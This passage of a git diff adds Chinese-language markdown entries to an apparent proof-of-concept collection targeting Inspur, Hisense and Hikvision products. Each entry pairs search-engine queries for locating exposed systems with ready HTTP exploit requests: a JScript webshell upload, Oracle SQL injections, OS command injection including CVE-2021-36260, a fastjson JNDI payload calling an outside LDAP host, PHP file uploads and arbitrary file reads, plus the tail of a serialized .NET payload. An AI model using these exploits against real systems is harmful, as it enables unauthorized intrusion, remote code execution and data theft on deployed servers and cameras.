JhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</printOpByte>
+      <printInfoByte></printInfoByte>
+    </SavePrintFormatAssign>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1722219048257-1c91e2a0-b8b9-4d62-bf4c-489bf0b9a677.png](./img/1hmSSjw47lb-A9Dr/1722219048257-1c91e2a0-b8b9-4d62-bf4c-489bf0b9a677-394780.png)
+
+
+
+> 更新: 2024-08-12 17:21:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oro7nh02gg79zwah>
\ No newline at end of file
diff --git a/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md b/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..5dbdcc3
--- /dev/null
+++ b/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 浪潮云财务系统UploadListFile存在任意文件上传漏洞
+
+浪潮云财务系统UploadListFile存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"
+```
+
+## poc
+
+```javascript
+POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: /
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
+ 
+-----------------------------rww5upkbw6ctf0tu5hye
+Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
+Content-Type: image/png
+ 
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+-----------------------------rww5upkbw6ctf0tu5hye--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312352567.png)
\ No newline at end of file
diff --git a/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..ba7dd2e
--- /dev/null
+++ b/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞
+
+海信智能公交企业管理系统是一套以智慧车、智慧站、智慧场为基础，以大数据和人工智能技术的公交云脑为核心，旨在全面提升公交企业的安全保障能力、运营生产效率、企业管理水平、决策分析能力和乘客出行体验的综合管理系统。海信智能公交企业管理系统 AdjustWorkHours.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+body="var _FactoryData"
+```
+
+## poc
+
+```javascript
+GET /YZSoft/Forms/XForm/BM/MaintainComManagement/AdjustWorkHours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241128093316189](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280933260.png)
\ No newline at end of file
diff --git a/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..450e035
--- /dev/null
+++ b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md	
@@ -0,0 +1,21 @@
+# 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞
+
+海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="var _FactoryData"
+```
+
+## poc
+
+```javascript
+GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+```
+
+![image-20241114142404785](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141424857.png)
\ No newline at end of file
diff --git a/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..450e035
--- /dev/null
+++ b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞
+
+海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="var _FactoryData"
+```
+
+## poc
+
+```javascript
+GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+```
+
+![image-20241114142404785](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141424857.png)
\ No newline at end of file
diff --git a/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..0d99ae0
--- /dev/null
+++ b/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 海信智能公交企业管理系统apply.aspx存在SQL注入漏洞
+
+海信智能公交企业管理系统是一套以智慧车、智慧站、智慧场为基础，以大数据和人工智能技术的公交云脑为核心，旨在全面提升公交企业的安全保障能力、运营生产效率、企业管理水平、决策分析能力和乘客出行体验的综合管理系统。海信智能公交企业管理系统apply.aspx存在SQL注入漏洞
+
+## fofa
+
+```javascript
+body="var _FactoryData"
+```
+
+## poc
+
+```javascript
+POST /YZSoft/Forms/XForm/OA/apply.aspx?tid=-1&did=-1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241122151741850](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221517939.png)
\ No newline at end of file
diff --git a/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md b/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md
new file mode 100644
index 0000000..85375c1
--- /dev/null
+++ b/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md
@@ -0,0 +1,27 @@
+## 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行
+海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。
+
+## fofa
+```
+icon_hash="-1830859634"
+```
+
+## poc
+```
+POST /php/ping.php HTTP/1.1
+Host: xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+Origin: http://xxx.xxx.xxx
+Connection: close
+Referer: http://xxx.xxx.xxx/html/system.html
+X-Forwarded-For: 127.0.0.1
+
+jsondata[type]=3&jsondata[ip]=ipconfig
+```
+![0a7e02e1600a63bf856d6581f918b036](https://github.com/wy876/POC/assets/139549762/7f52597a-bcb4-402e-89fe-c0682cb61d40)
diff --git a/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md b/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md
new file mode 100644
index 0000000..ba7667b
--- /dev/null
+++ b/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md
@@ -0,0 +1,102 @@
+# 海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
+
+# 一、漏洞简介
+海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞（CVE-2021-36260）。漏洞影响IP摄像头和NVR设备固件，漏洞是因为对输入参数检验不充分，未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备，即可实现远程命令执行。
+
+# 二、影响版本
++ <font style="color:rgba(0, 0, 0, 0.9);">易受攻击的网络摄像机固件。</font>
+
+| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
+| :---: | :---: |
+| <font style="color:black;">IPC_E0</font> | <font style="color:black;">IPC_E0_CN_STD_5.4.6_180112</font> |
+| <font style="color:black;">IPC_E1</font> | <font style="color:black;">未知</font> |
+| <font style="color:black;">IPC_E2</font> | <font style="color:black;">IPC_E2_EN_STD_5.5.52_180620</font> |
+| <font style="color:black;">IPC_E4</font> | <font style="color:black;">未知</font> |
+| <font style="color:black;">IPC_E6</font> | <font style="color:black;">IPCK_E6_EN_STD_5.5.100_200226</font> |
+| <font style="color:black;">IPC_E7</font> | <font style="color:black;">IPCK_E7_EN_STD_5.5.120_200604</font> |
+| <font style="color:black;">IPC_G3</font> | <font style="color:black;">IPC_G3_EN_STD_5.5.160_210416</font> |
+| <font style="color:black;">IPC_G5</font> | <font style="color:black;">IPC_G5_EN_STD_5.5.113_210317</font> |
+| <font style="color:black;">IPC_H1</font> | <font style="color:black;">IPC_H1_EN_STD_5.4.61_181204</font> |
+| <font style="color:black;">IPC_H5</font> | <font style="color:black;">IPCP_H5_EN_STD_5.5.85_201120</font> |
+| <font style="color:black;">IPC_H8</font> | <font style="color:black;">Factory installed firmware mid 2021</font> |
+| <font style="color:black;">IPC_R2</font> | <font style="color:black;">IPC_R2_EN_STD_V5.4.81_180203</font> |
+
+
+<font style="color:rgba(0, 0, 0, 0.9);">易受攻击的 PTZ 摄像机固件。</font>
+
+| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
+| :---: | :---: |
+| <font style="color:black;">IPD_E7</font> | <font style="color:black;">IPDEX_E7_EN_STD_5.6.30_210526</font> |
+| <font style="color:black;">IPD_G3</font> | <font style="color:black;">IPDES_G3_EN_STD_5.5.42_210106</font> |
+| <font style="color:black;">IPD_H5</font> | <font style="color:black;">IPD_H5_EN_STD_5.5.41_200911</font> |
+| <font style="color:black;">IPD_H7</font> | <font style="color:black;">IPD_H7_EN_STD_5.5.40_200721</font> |
+| <font style="color:black;">IPD_H8</font> | <font style="color:black;">IPD_H8_EN_STD_5.7.1_210619</font> |
+
+
+<font style="color:rgba(0, 0, 0, 0.9);">易受攻击的旧固件。</font>
+
+| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
+| :---: | :---: |
+| <font style="color:black;">IPC_R7</font> | <font style="color:black;">5.4.x</font> |
+| <font style="color:black;">IPD_</font><font style="color:black;">R7</font> | |
+| <font style="color:black;">IPC_G0</font> | |
+| <font style="color:black;">IPC_H3</font> | |
+| <font style="color:black;">IPD_H3</font> | |
+
+
+# 三、资产测绘
++ hunter`header="671-1e0-587ec4a1"`
++ 特征
+
+![1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673.png](./img/BRUyZKZO0-k6Y5uv/1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673-137663.png)
+
+# 四、漏洞复现
+1. 执行命令，写入到文件中
+
+```plain
+PUT /SDK/webLanguage HTTP/1.1
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: xx.xx.xx.xx
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: en-US,en;q=0.9,sv;q=0.8
+Content-Length: 79
+
+<?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/x)</language>
+```
+
+![1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5.png](./img/BRUyZKZO0-k6Y5uv/1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5-028165.png)
+
+2. 获取命令执行结果
+
+```plain
+GET /x HTTP/1.1
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: xx.xx.xx.xx
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: en-US,en;q=0.9,sv;q=0.8
+```
+
+![1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437.png](./img/BRUyZKZO0-k6Y5uv/1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437-357466.png)
+
+利用脚本
+
+[HIKVISION_CVE-2021-36260_rce.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py)
+
+```plain
+python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al"
+```
+
+![1700232671938-598342d8-9715-45cc-8ecf-477e359015aa.png](./img/BRUyZKZO0-k6Y5uv/1700232671938-598342d8-9715-45cc-8ecf-477e359015aa-640350.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph37hx0zftramet9>
\ No newline at end of file
diff --git a/海康威视IVMS-8700-fastjson命令执行漏洞.md b/海康威视IVMS-8700-fastjson命令执行漏洞.md
new file mode 100644
index 0000000..354efed
--- /dev/null
+++ b/海康威视IVMS-8700-fastjson命令执行漏洞.md
@@ -0,0 +1,17 @@
+## 海康威视IVMS-8700 fastjson命令执行漏洞
+
+```
+POST /bic/ssoService/v1/applyCT HTTP/1.1
+Host: 127.0.0.1
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: cross-site
+Sec-Fetch-User: ?1
+Te: trailers
+Content-Type: application/json
+Content-Length: 204
+
+{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}
+```
diff --git a/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md
new file mode 100644
index 0000000..7b24dac
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md
@@ -0,0 +1,46 @@
+# 海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传漏洞，恶意攻击者可能会上传恶意的后门文件，使服务器失陷。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/0NNFrB2N2TFVw-Ep/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-210262.png)
+
+# 四、漏洞复现
+```java
+POST /php/addscenedata.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Connection: close
+Content-Length: 218
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
+Accept-Encoding: gzip
+
+------WebKitFormBoundary4LuoBRpTiVBo9cIQ
+Content-Disposition: form-data; name="upload"; filename="tt.php"
+Content-Type: text/plain
+
+123
+------WebKitFormBoundary4LuoBRpTiVBo9cIQ--
+```
+
+![1704857585745-e3b20507-4f5a-4331-a42b-b30b4fa09640.png](./img/0NNFrB2N2TFVw-Ep/1704857585745-e3b20507-4f5a-4331-a42b-b30b4fa09640-505659.png)
+
+上传文件位置
+
+```java
+/images/scene/tt.php
+```
+
+![1704857616251-0aa885ce-2985-4d09-8ed3-a968ca4a8fac.png](./img/0NNFrB2N2TFVw-Ep/1704857616251-0aa885ce-2985-4d09-8ed3-a968ca4a8fac-207072.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fv7cprclagh53ls1>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md
new file mode 100644
index 0000000..760269d
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞，恶意攻击者可能会上传恶意的后门文件，使服务器失陷。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/eEgA4wXoVftviTL4/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-059681.png)
+
+# 四、漏洞复现
+```plain
+POST /php/busyscreenshotpush.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
+Content-Length: 181
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+
+jsondata[caller]=1&jsondata[callee]=1&jsondata[imagename]=..\..\..\Wnmp\WWW\upload\1_0_xjayuiwqzj.php&jsondata[imagecontent]=PD9waHAgZWNobyAxMTEqMTExOyB1bmxpbmsoX19GSUxFX18pOyA/Pg==
+```
+
+![1706074591038-de25acd2-2194-4a9f-aaf3-e39839d43b07.png](./img/eEgA4wXoVftviTL4/1706074591038-de25acd2-2194-4a9f-aaf3-e39839d43b07-196152.png)
+
+上传文件位置
+
+```plain
+GET /upload/1_0_xjayuiwqzj.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1706074625976-5f0afac2-b803-4816-a5f8-1332bc07b28a.png](./img/eEgA4wXoVftviTL4/1706074625976-5f0afac2-b803-4816-a5f8-1332bc07b28a-044143.png)
+
+[spon-网络对讲-busyscreenshotpush-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222236974-3b0a8a41-ca74-4d04-8da4-26985556355d.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/omhkq94uk2gotskw>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md
new file mode 100644
index 0000000..81acaf8
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 海康威视SPON IP网络对讲广播系统exportrecord存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统exportrecord存在任意文件读取漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/Yd53WVvuLyYlHyQc/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-424515.png)
+
+# 四、漏洞复现
+```java
+GET /php/exportrecord.php?downtype=10&downname=C:\\Windows\\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1704870941456-ccd140a6-371b-419f-b1a9-f0bd3dfee005.png](./img/Yd53WVvuLyYlHyQc/1704870941456-ccd140a6-371b-419f-b1a9-f0bd3dfee005-744555.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ik7ee4of0gu8yk8n>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md
new file mode 100644
index 0000000..cf13c9a
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md
@@ -0,0 +1,37 @@
+# 海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/0U2NLRBKAT56CH1C/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-116718.png)
+
+# 四、漏洞复现
+```java
+POST /php/getjson.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
